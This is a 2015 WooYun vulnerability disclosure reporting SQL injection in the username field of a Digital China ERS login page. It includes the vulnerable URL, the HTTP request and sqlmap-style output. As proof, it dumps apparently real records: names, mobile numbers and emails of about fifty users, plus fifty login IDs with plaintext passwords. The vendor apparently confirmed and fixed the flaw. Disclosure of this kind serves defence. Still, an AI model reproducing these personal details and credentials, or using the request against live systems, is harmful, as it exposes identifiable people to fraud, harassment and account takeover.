当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140209

漏洞标题:神州数码某业务系统SQL注入(百万用户泄露/姓名/手机/邮箱)

相关厂商:digitalchina.com

漏洞作者: 深度安全实验室

提交时间:2015-09-10 15:40

修复时间:2015-10-19 17:04

公开时间:2015-10-19 17:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-10: 细节已通知厂商并且等待厂商处理中
2015-09-10: 厂商已经确认,细节仅向厂商公开
2015-09-20: 细节向核心白帽子及相关领域专家公开
2015-09-30: 细节向普通白帽子公开
2015-10-10: 细节向实习白帽子公开
2015-10-19: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

rt

详细说明:

神州数码ERS(企业运行系统)

http://servexpress.digitalchina.com/kuwei/login.aspx


如下链接存在SQL注入,其中,tbUserName参数存在问题

POST /kuwei/login.aspx HTTP/1.1
Host: servexpress.digitalchina.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://servexpress.digitalchina.com/kuwei/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 235
__VIEWSTATE=%2FwEPDwULLTIwODc3MDcwOTFkZIkZFzpwA8d1FNax7clULpKJTLx4&__VIEWSTATEGENERATOR=DFA04AFB&__EVENTVALIDATION=%2FwEWBALt%2BoOECgLyj%2FOQAgLAr6WkDAKC3IeGDNdTTbqFnv4Z3Si53LdEQHxhpOct&tbUserName=a&tbPwd=1&btnLogin=%E7%99%BB+%E9%99%86

1.jpg

漏洞证明:

13个库

2.jpg


以ERS库为例,发现接近千万的数据表

back-end DBMS: Oracle
Database: ERS
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| BARCODE_AMD | 9831947 |
| LOGIN_LIST | 4143080 |
| CUST | 2719840 |
| PERSON_INF | 2393879 |
| CCS_DELL_RESULT | 1154633 |
| CCS_DIAL_RECORD | 1153564 |
| MAIL | 1056880 |
| CCS_CASE_STEP | 884353 |
| CCS_CASE | 854856 |
| SMS_INF | 834816 |
| HITACHI_HD_INF | 784146 |
| CCS_SATISFY | 622292 |
| P_M_INF | 583619 |
| CCS_ERS_TASK | 511110 |
| CCS_ERS_RESULT | 511090 |


J_USERS_INF表泄露的用户信息,包括:姓名、手机号码、邮箱等

Database: ERS
Table: J_USERS_INF
[50 entries]
+---------+-----------+-----------------------------+------------------+-----------+
| USER_ID | USER_NAME | E_MAIL_NBR | MOBILE_NBR | CREATE_AT |
+---------+-----------+-----------------------------+------------------+-----------+
| 142 | 余骅 | yh1718844@163.com | 13811862770 | 06-6月 -12 |
| 143 | 王伟龙 | wang.we@otto-fuchs.cn | 15142079527 | 06-6月 -12 |
| 144 | 邹坤 | NULL | 13207184555 | 06-6月 -12 |
| 145 | 郭久阳 | NULL | 13478275275 | 06-6月 -12 |
| 146 | 彬安龙 | NULL | 13951650242 | 06-6月 -12 |
| 147 | 陈东 | toshiba_toyou@163.com | 13802097913 | 06-6月 -12 |
| 148 | 刘文生 | NULL | 15641116787 | 06-6月 -12 |
| 149 | 滕乐鹏 | qdlhlenovo@163.com | 13780628850 | 06-6月 -12 |
| 150 | 黄彦雷 | NULL | 13526876737 | 06-6月 -12 |
| 151 | 项目运维1 | huangxinga@digitalchina.com | 15101575802 | 13-6月 -12 |
| 171 | ceshi | zhuyuee@digitalchina.com | 1111111111111111 | 14-6月 -12 |
| 191 | 许悦 | xuyuea@digitalchina.com | 13801210184 | 17-7月 -12 |
| 211 | 刘鹏 | liupengr@DIGITALCHINA.COM | 13675167290 | 20-7月 -12 |
| 231 | 李国煦 | njkf@dc | 13815852208 | 20-7月 -12 |
| 232 | 朱世林 | zhusl@digitalchina.com | 13390912340 | 20-7月 -12 |
| 233 | 马宁 | maningb@digitalchina.com | 13601128959 | 20-7月 -12 |
| 251 | 吴蝶玲 | wudl@dcservice.cn | 13711011390 | 26-7月 -12 |
| 271 | 李新鹏 | lixpd@digitalchina.com | 15801239816 | 11-10月-12 |
| 291 | | lixinpeng530@163.com | 15801239816 | 30-10月-12 |
| 311 | 郭文莉 | Guowlc@digitalchina.com | 13918683154 | 21-11月-12 |
| 591 | 扬子 | wangdayangzi@163.com | 13512803668 | 07-3月 -13 |
| 611 | 佛山禅城 | kas@fshead.com | 13929936931 | 08-3月 -13 |
| 631 | 黄佳斌 | NULL | 18925663588 | 12-3月 -13 |
| 651 | 绍兴 | zhang_yf1982@126.com | 18657580084 | 12-3月 -13 |
| 652 | 安大威 | NULL | 18241206034 | 12-3月 -13 |
| 511 | 王晓山 | lxjt_shan@163.com | 13911253890 | 28-2月 -13 |
| 512 | | lixpd@digitalchina.com | 15801239816 | 28-2月 -13 |
| 531 | 李永强 | NULL | 13511071894 | 01-3月 -13 |
| 551 | CallCent | NULL | NULL | 01-3月 -13 |
| 571 | test2 | NULL | NULL | 05-3月 -13 |
| 653 | 南通 | ccc3033@dcmro.com | 18021383265 | 12-3月 -13 |
| 654 | 庄子丹 | 13773505901@163.com | 18036261352 | 12-3月 -13 |
| 671 | 曲福渔 | 33054837@qq.com | 13303175756 | 13-3月 -13 |
| 691 | 董秋花 | ccc3007@dcmro.com | 13729965503 | 14-3月 -13 |
| 692 | 李艳梅 | liym@dcservice.cn | 13824296001 | 14-3月 -13 |
| 693 | 鞍山 | 253581833@qq.com | 13998008046 | 14-3月 -13 |
| 694 | 陈健宙 | 19397500@qq.com | 18927705666 | 14-3月 -13 |
| 711 | 包头-韩烨 | ccc4003@dcmro.com | 15848668078 | 15-3月 -13 |
| 731 | 向兵 | NULL | 13013613016 | 16-3月 -13 |
| 751 | 周海亮 | lukeshuma@163.com | 13455730555 | 18-3月 -13 |
| 771 | 王剑平 | tfbenq@vip.sina.com | 13905523293 | 19-3月 -13 |
| 772 | 曾小芹 | 5659567@qq.com | 18970333373 | 19-3月 -13 |
| 791 | 王远方 | NULL | 13917287914 | 24-3月 -13 |
| 792 | NULL | NULL | NULL | 24-3月 -13 |
| 811 | 李松 | 2444736793@qq.com | 15641801930 | 27-3月 -13 |
| 831 | 房俊峰 | fangjunfeng2002@163.com | 13834584172 | 09-4月 -13 |
| 851 | 李照磊 | lizlg@digitalchina.com | 15901925646 | 15-4月 -13 |
| 871 | 陈炳宗 | NULL | 15805081052 | 15-4月 -13 |
| 891 | 江洋 | NULL | 15999675518 | 15-4月 -13 |
| 911 | 赵迎 | xzrbgs@126.com | 13685124537 | 17-4月 -13 |
+---------+-----------+-----------------------------+------------------+-----------+

修复方案:

DIC_USERS表泄露的用户信息,包括:用户名、密码等,密码还是明文存储的

Database: ERS
Table: DIC_USERS
[50 entries]
+---------+-------------+--------------+-----+-------------+----------------------+
| USER_ID | LOGIN_ID | PASSWORD | M1 | M2 | LAST_UPDATE_PWD_DATE |
+---------+-------------+--------------+-----+-------------+----------------------+
| 10140 | dc-fucx1 | zzzzzz1 | nec | dc-fucx1 | 2015-04-01 15:56:26 |
| 10141 | xa-songzy | song123 | nec | xa-songzy | 2009-10-09 09:38:18 |
| 10142 | bj-zhaoyan | 885669 | nec | bj-zhaoyan | 2001-01-01 00:00:00 |
| 10144 | dc-lyq | 1qa23z | nec | dc-lyq | 2012-03-12 11:48:43 |
| 10145 | sh-kl | 64661559kl | nec | sh-kl | 2011-09-07 18:27:12 |
| 10146 | bj2-yzy | yzy | nec | bj2-yzy | 2001-01-01 00:00:00 |
| 10147 | wh-lvyp | lyp811214 | nec | wh-lvyp | 2008-12-15 10:10:58 |
| 10148 | sy-huanghai | huanghai | nec | sy-huanghai | 2001-01-01 00:00:00 |
| 10149 | bj-libr | libr | nec | bj-libr | 2001-01-01 00:00:00 |
| 10150 | bj-liujd | 12345 | nec | bj-liujd | 2001-01-01 00:00:00 |
| 10151 | xa-liwq | 123456l | nec | xa-liwq | 2015-04-01 14:24:12 |
| 10152 | dc-syl | enter | nec | dc-syl | 2001-01-01 00:00:00 |
| 10153 | bj-lj | lijiae1 | nec | bj-lj | 2009-10-09 10:58:50 |
| 10154 | bj-fuqh | fuqh | nec | bj-fuqh | 2001-01-01 00:00:00 |
| 10155 | dc-zb | zhaobin7879 | nec | dc-zb | 2014-06-16 17:59:19 |
| 10156 | nj-zt | nj | nec | nj-zt | 2001-01-01 00:00:00 |
| 10157 | bj-fanyj | blfiqpgf | nec | bj-fanyj | 2001-01-01 00:00:00 |
| 10158 | bj-jl | akuma820809 | nec | bj-jl | 2001-01-01 00:00:00 |
| 10159 | bj2-jl | akuma820809 | nec | bj2-jl | 2001-01-01 00:00:00 |
| 10160 | bj2-mn | maning122802 | nec | bj2-mn | 2013-02-21 14:29:31 |
| 10161 | bj2-fyj | 198000 | nec | bj2-fyj | 2001-01-01 00:00:00 |
| 10162 | bj-xzm | xzm | nec | bj-xzm | 2001-01-01 00:00:00 |
| 10163 | sh-zxl | zxl321 | nec | sh-zxl | 2015-04-03 14:39:05 |
| 10164 | bj-zhy | zhy123 | nec | bj-zhy | 2013-07-08 09:16:43 |
| 10165 | dc-cc | dccc800 | nec | dc-cc | 2015-06-26 09:25:13 |
| 10166 | bj-lbw | 5211314 | nec | bj-lbw | 2001-01-01 00:00:00 |
| 10167 | sh-lx | anad0728 | nec | sh-lx | 2015-05-08 18:08:50 |
| 10168 | dc-sqj | 13301353150 | nec | dc-sqj | 2001-01-01 00:00:00 |
| 10170 | dc-wwj | 0606wwj | nec | dc-wwj | 2011-09-14 09:42:55 |
| 10171 | dc-wg | newpass123x | nec | dc-wg | 2013-09-23 15:13:00 |
| 10173 | bj-hxq | hxq000 | nec | bj-hxq | 2015-01-23 09:20:29 |
| 10175 | sh-zsy | tos901 | nec | sh-zsy | 2014-05-13 16:15:57 |
| 10176 | wh-lly | asd321 | nec | wh-lly | 2014-03-28 12:35:06 |
| 10177 | sz-tzy | NONE | nec | sz-tzy | 2001-01-01 00:00:00 |
| 10178 | bj-ty | ty19710401 | nec | bj-ty | 2008-12-31 15:16:16 |
| 10179 | bj-ln | 1234 | nec | bj-ln | 2001-01-01 00:00:00 |
| 10180 | bj-mn | 19810802 | nec | bj-mn | 2001-01-01 00:00:00 |
| 10181 | bj-wl | 741852pp | nec | bj-wl | 2013-07-04 18:44:50 |
| 10182 | bj-jxl | ooo | nec | bj-jxl | 2001-01-01 00:00:00 |
| 10183 | dc-nw | 781029 | nec | dc-nw | 2001-01-01 00:00:00 |
| 10184 | jn-zl | 123asd | nec | jn-zl | 2009-10-16 15:38:12 |
| 10185 | nj-zxy | zxy | nec | nj-zxy | 2012-07-05 14:19:53 |
| 10186 | dc-zhuhj | aaa111 | nec | dc-zhuhj | 2014-06-06 11:21:41 |
| 10187 | dc-niewei | 456 | nec | dc-niewei | 2001-01-01 00:00:00 |
| 10188 | nec-jzq | nec12345 | nec | nec-jzq | 2009-01-05 13:57:29 |
| 10189 | 10189 | lizhb2009 | nec | cd-zhouzh | 2010-09-21 18:17:24 |
| 10190 | nec-zq | nec111 | nec | nec-zq | 2009-03-12 17:55:26 |
| 10191 | nec-zgyj | 11111 | nec | nec-zgyj | 2001-01-01 00:00:00 |
| 10192 | nec-hy | 12345678 | nec | nec-hy | 2001-01-01 00:00:00 |
| 10193 | dc-yangqian | 42yangqian | nec | dc-yangqian | 2014-07-15 11:35:09 |
+---------+-------------+--------------+-----+-------------+----------------------+

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-09-10 16:44

厂商回复:

尽快处理,谢谢!

最新状态:

2015-10-19:已修复